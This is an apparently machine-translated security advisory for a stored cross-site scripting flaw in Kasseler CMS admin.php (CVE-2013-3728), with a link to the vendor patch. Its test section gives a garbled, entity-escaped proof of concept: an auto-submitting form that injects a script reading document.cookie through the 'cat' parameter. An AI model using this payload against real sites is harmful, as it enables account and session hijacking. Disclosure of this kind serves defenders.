Kasseler CMS 'admin. php' HTML Injection Vulnerability

Released on: 2013-07-03
Updated on:

Affected Systems:
Kasseler CMS <= 2 r1223
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60927
CVE (CAN) ID: CVE-2013-3728

Kasseler CMS is a content management system.

Kasseler CMS 2 r1223 has the storage-type cross-site scripting vulnerability, which is caused by the lack of adequate Filtering for the "cat" http post parameter in the "/admin. php" script. If a remote attacker can create a directory, arbitrary HTML and script code can be injected into the application database and executed in the browser of each site browser.

<* Source: High-Tech Bridge Security Research Lab

Link: https://www.htbridge.com/advisory/HTB23158
Http://seclists.org/bugtraq/2013/Jul/26
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

& Amp; lt; form action = & quot; http://www.example.com/admin.php? Module = forum & amp; do = admin_new_category & quot; method = & quot; post & quot; name = & quot; main & quot; & amp; gt;
& Amp; lt; input type = & quot; hidden & quot; name = & quot; cat & quot; value = & quot; & amp; lt; script & amp; gt; alert (document. cookie); & amp; lt;/script & amp; gt; & quot; & amp; gt;
& Amp; lt; input type = & quot; submit & quot; id = & quot; btn & quot; & amp; gt;
& Amp; lt;/form & amp; gt;
& Amp; lt; script & amp; gt;
Document. main. submit ();
& Amp; lt;/script & amp; gt;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Kasseler CMS
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://diff.kasseler-cms.net/svn/patches/1232.html